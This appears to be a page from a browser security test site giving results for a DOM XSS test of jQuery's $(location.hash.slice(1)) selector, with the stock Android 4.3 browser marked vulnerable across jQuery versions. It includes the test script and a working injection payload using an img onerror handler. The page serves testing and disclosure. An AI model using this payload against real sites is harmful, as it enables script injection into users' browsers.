Jquery ID selector + location.hash.slice(1)

$(location.hash.slice(1))

By
Psych0tr1a 0 Seen 643 times
Tags
DOM XSS Jquery Selector
Run this test now.

Results


Tested on
Chrome - 67 - Windows 7
jQuery version:Status:
jQuery 2.0.2Safe
jQuery 2.0.3Safe
jQuery 2.0.0Safe
jQuery 1.8.3Safe
jQuery 1.9.1Safe
jQuery 1.10.1Safe
jQuery 1.10.2Safe
jQuery 1.10.0Safe
jQuery 1.9.0Safe
jQuery 2.0.1Safe
jQuery 1.5.0Safe
jQuery 1.3.2Safe
jQuery 1.6.0Safe
jQuery 1.8.2Safe
jQuery 1.8.1Safe
jQuery 1.4.3Safe
jQuery 1.3.1Safe
jQuery 1.4.2Safe
jQuery 1.4.4Safe
jQuery 1.8.0Safe
jQuery 1.4.1Safe
jQuery 1.2.6Safe
jQuery 1.4.0Safe
jQuery 1.2.3Safe
jQuery 1.3.0Safe
jQuery 1.7.1Safe
jQuery 1.7.0Safe
jQuery 1.6.4Safe
jQuery 1.7.2Safe
jQuery 1.6.3Safe
jQuery 1.6.1Safe
jQuery 1.6.2Safe
jQuery 1.5.2Safe
jQuery 1.5.1Safe

Tested on
Firefox - 52 - Linux
jQuery version:Status:
jQuery 2.0.3Safe
jQuery 2.0.2Safe
jQuery 1.10.2Safe
jQuery 1.10.1Safe
jQuery 2.0.1Safe
jQuery 1.10.0Safe
jQuery 2.0.0Safe
jQuery 1.9.1Safe
jQuery 1.8.3Safe
jQuery 1.9.0Safe
jQuery 1.6.4Safe
jQuery 1.6.2Safe
jQuery 1.6.0Safe
jQuery 1.5.2Safe
jQuery 1.6.3Safe
jQuery 1.6.1Safe
jQuery 1.5.1Safe
jQuery 1.5.0Safe
jQuery 1.4.4Safe
jQuery 1.4.3Safe
jQuery 1.4.2Safe
jQuery 1.4.1Safe
jQuery 1.4.0Safe
jQuery 1.3.2Safe
jQuery 1.2.6Safe
jQuery 1.2.3Safe
jQuery 1.3.0Safe
jQuery 1.8.1Safe
jQuery 1.8.0Safe
jQuery 1.8.2Safe
jQuery 1.7.2Safe
jQuery 1.7.1Safe
jQuery 1.7.0Safe
jQuery 1.3.1Safe

Tested on
Chrome Mobile - 41 - Android
jQuery version:Status:
jQuery 2.0.3Safe
jQuery 2.0.2Safe
jQuery 2.0.1Safe
jQuery 2.0.0Safe
jQuery 1.10.2Safe
jQuery 1.10.1Safe
jQuery 1.10.0Safe
jQuery 1.9.1Safe
jQuery 1.9.0Safe
jQuery 1.8.3Safe
jQuery 1.8.2Safe
jQuery 1.8.1Safe
jQuery 1.8.0Safe
jQuery 1.7.2Safe
jQuery 1.7.1Safe
jQuery 1.7.0Safe
jQuery 1.6.4Safe
jQuery 1.6.3Safe
jQuery 1.6.2Safe
jQuery 1.6.1Safe
jQuery 1.6.0Safe
jQuery 1.5.2Safe
jQuery 1.5.1Safe
jQuery 1.5.0Safe
jQuery 1.4.4Safe
jQuery 1.4.3Safe
jQuery 1.4.2Safe
jQuery 1.4.1Safe
jQuery 1.4.0Safe
jQuery 1.3.2Safe
jQuery 1.3.1Safe
jQuery 1.3.0Safe
jQuery 1.2.6Safe
jQuery 1.2.3Safe

Tested on
Googlebot - 2.1 - undefined
jQuery version:Status:
jQuery 2.0.3Safe
jQuery 2.0.2Safe
jQuery 2.0.1Safe
jQuery 2.0.0Safe
jQuery 1.10.2Safe
jQuery 1.10.1Safe
jQuery 1.10.0Safe
jQuery 1.9.1Safe
jQuery 1.9.0Safe
jQuery 1.8.3Safe
jQuery 1.8.2Safe
jQuery 1.8.1Safe
jQuery 1.8.0Safe
jQuery 1.7.2Safe
jQuery 1.7.1Safe
jQuery 1.7.0Safe
jQuery 1.6.4Safe
jQuery 1.6.3Safe
jQuery 1.6.2Safe
jQuery 1.6.1Safe
jQuery 1.6.0Safe
jQuery 1.5.2Safe
jQuery 1.5.1Safe
jQuery 1.5.0Safe
jQuery 1.4.4Safe
jQuery 1.4.3Safe
jQuery 1.4.2Safe
jQuery 1.4.1Safe
jQuery 1.4.0Safe
jQuery 1.3.2Safe
jQuery 1.3.1Safe
jQuery 1.3.0Safe
jQuery 1.2.6Safe
jQuery 1.2.3Safe

Tested on
Android - 4.3 - Android
jQuery version:Status:
jQuery 2.0.3Vulnerable
jQuery 2.0.2Vulnerable
jQuery 1.10.2Vulnerable
jQuery 1.10.1Vulnerable
jQuery 2.0.0Vulnerable
jQuery 1.9.0Vulnerable
jQuery 1.9.1Vulnerable
jQuery 1.10.0Vulnerable
jQuery 2.0.1Vulnerable
jQuery 1.8.3Vulnerable
jQuery 1.8.2Vulnerable
jQuery 1.8.1Vulnerable
jQuery 1.8.0Vulnerable
jQuery 1.7.2Vulnerable
jQuery 1.7.1Vulnerable
jQuery 1.7.0Vulnerable
jQuery 1.6.4Vulnerable
jQuery 1.6.3Vulnerable
jQuery 1.6.2Vulnerable
jQuery 1.6.1Vulnerable
jQuery 1.6.0Vulnerable
jQuery 1.5.2Vulnerable
jQuery 1.5.1Vulnerable
jQuery 1.5.0Vulnerable
jQuery 1.4.4Vulnerable
jQuery 1.4.3Vulnerable
jQuery 1.4.2Vulnerable
jQuery 1.4.1Vulnerable
jQuery 1.4.0Vulnerable
jQuery 1.3.2Vulnerable
jQuery 1.3.1Vulnerable
jQuery 1.2.6Vulnerable
jQuery 1.3.0Vulnerable
jQuery 1.2.3Vulnerable

User Script (ENUM_FUNCTION)

					
var jQuery_version = '';

function vulnerable(){
	addError('jQuery '+ jQuery_version, '<b>Vulnerable</b>');
}

function safe(){
	addSuccess('jQuery '+ jQuery_version, 'Safe');
}
	
function removeIframe(){
	var x = document.getElementById('jQueryFrameID');
	x.parentNode.removeChild(x);
}


function test(data){
	try{
	    console.log(data)
	    
		jQuery_version = data;
		
		
		var jQueryFrame = document.createElement('iframe');
		jQueryFrame.id = 'jQueryFrameID';
		var exploitHTML = '<script src="//ajax.googleapis.com/ajax/libs/jquery/'+ jQuery_version.toString() +'/jquery.js"><\/script><script>var tst=0;location.hash="<img src=s onerror=tst=1>";$(function(){$(location.hash.slice(1))});setTimeout("if(tst==1){parent.vulnerable()}else{parent.safe()};parent.removeIframe()",1000)<\/script>';
		document.body.appendChild(jQueryFrame);
		iframeDoc = jQueryFrame.contentDocument || jQueryFrame.contentWindow.document;
		iframeDoc.open();
		iframeDoc.write(exploitHTML);
		iframeDoc.close();
		
	}
	catch(err){
		addInfo(jQuery_version , 'Some Error Occured: ' + err);
	}
}

					
				

Enum Data (ENUM_FUNCTION)

					
var data = ['2.0.3', '2.0.2', '2.0.1', '2.0.0', '1.10.2', '1.10.1', '1.10.0', '1.9.1', '1.9.0', '1.8.3', '1.8.2', '1.8.1', '1.8.0', '1.7.2', '1.7.1', '1.7.0', '1.6.4', '1.6.3', '1.6.2', '1.6.1', '1.6.0', '1.5.2', '1.5.1', '1.5.0', '1.4.4', '1.4.3', '1.4.2', '1.4.1', '1.4.0', '1.3.2', '1.3.1', '1.3.0', '1.2.6', '1.2.3'];